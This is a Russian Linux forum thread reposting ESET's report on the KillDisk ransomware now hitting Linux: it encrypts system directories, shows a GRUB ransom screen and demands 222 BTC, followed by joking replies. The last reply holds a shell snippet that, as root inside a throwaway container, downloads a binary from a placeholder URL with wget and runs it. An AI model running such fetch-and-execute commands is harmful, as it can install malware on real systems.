Исследователи по ИТ-безопасности из компании ESET опубликовали сообщение о новой версии трояна-вымогателя KillDisk, которая ориентирована на компьютеры, работающие под управлением операционной системы GNU/Linux.
Троян KillDisk стал широко известен благодаря своим атакам на украинские компании в конце 2015 года (включая атаку на энергетические компании в декабре, получившую название «BlackEnergy»). В декабре этого года атаки KillDisk продолжились, причём злоумышленники начали использовать дополнительные инструменты (в частности, бэкдор Meterpreter). Недавно же была выявлена новая модификация KillDisk, которая относится к категории троянов-вымогателей: она зашифровывает файлы компьютера, после чего предлагает получить их обратно в обмен на выкуп в объёме 222 BTC (Bitcoins), что составляет около 250 тысяч USD. Заявляется, что последняя версия трояна нацелена на операционные системы Windows и GNU/Linux, поражает десктопы и серверы.
В случае Linux-платформы троян KillDisk обходит основные каталоги корневой директории (включая /home, /root, /boot, /etc, /usr и т.д.), делая это рекурсивно с глубиной до 17 подкаталогов. После ребута инфицированная ОС не загружается, а требование о выкупе выводится прямо в меню загрузчика GRUB. Исследователи ESET утверждают, что формально «восстановление зашифрованных файлов невозможно даже в случае уплаты выкупа», объясняя это тем, что «ключи шифрования нигде не сохраняются, после перезагрузки зараженной системы жертва теряет свои данные безвозвратно». Однако одновременно сообщается, что в шифровании, которое используется в Linux, есть уязвимость, которая «делает восстановление возможным, хотя и достаточно сложным».
О том, как KillDisk заражает Linux-компьютеры, в сообщении ESET не уточняется. В новости о прошлой модификации вируса (для Windows) заявлялось, что «для заражения компьютеров жертв хакеры используют фишинговые электронные письма с документами Excel, которые содержат вредоносные макросы». Но такой способ вряд ли применим к случаю с Linux-системами.
[NIXP] ESET: Троян-вымогатель KillDisk добрался до Linux-компьютеров
Модератор: Модераторы разделов
- Dmitry Shurupov
- Сообщения: 336
- Статус: Open Source geek
- ОС: Ubuntu Linux
- Контактная информация:
[NIXP] ESET: Троян-вымогатель KillDisk добрался до Linux-компьютеров
По-моему, это еще один повод перейти на Убунту.
- Stauffenberg
- Сообщения: 2042
- Статус: ☮ PEACE ☮
- ОС: открытая и свободная
Re: [NIXP] ESET: Троян-вымогатель KillDisk добрался до Linux-компьютеров
и ни слова о том, как именно подхватить троян, и как он умудряется самостоятельно выполняться в системе от root
Labor omnia vincit
"Debugging is twice as hard as writing the code in the first place.
Therefore, if you write the code as cleverly as possible, you are, by definition, not smart enough to debug it.” (Brian Kernighan)
"Debugging is twice as hard as writing the code in the first place.
Therefore, if you write the code as cleverly as possible, you are, by definition, not smart enough to debug it.” (Brian Kernighan)
Re: [NIXP] ESET: Троян-вымогатель KillDisk добрался до Linux-компьютеров
Как обычно: скачать неизвестно откуда как бы интересную программу и установить от root
Спасибо сказали:
- Stauffenberg
- Сообщения: 2042
- Статус: ☮ PEACE ☮
- ОС: открытая и свободная
Re: [NIXP] ESET: Троян-вымогатель KillDisk добрался до Linux-компьютеров
Первый же коммент начинается с
Can you provide more information about how the infection takes place?
Labor omnia vincit
"Debugging is twice as hard as writing the code in the first place.
Therefore, if you write the code as cleverly as possible, you are, by definition, not smart enough to debug it.” (Brian Kernighan)
"Debugging is twice as hard as writing the code in the first place.
Therefore, if you write the code as cleverly as possible, you are, by definition, not smart enough to debug it.” (Brian Kernighan)
Спасибо сказали:
- Red Gremlin
- Сообщения: 506
- Статус: самоучка
- ОС: Rosa 2016 Fresh
Re: [NIXP] ESET: Троян-вымогатель KillDisk добрался до Linux-компьютеров
Код: Выделить всё
machinectl clone base test
machinectl start test
systemd-run --machine=test --uid=0 sh 'wget http://<path_to_killdisk> -o bigbadaboom && chmod u+x bigbadaboom && ./bigbadaboom'
cowsay "KillDisk installed!"
machinectl poweroff test
machinectl remove test
"В мире есть случайность, есть предопределенность и есть то, что ты планируешь совершить."
Спасибо сказали: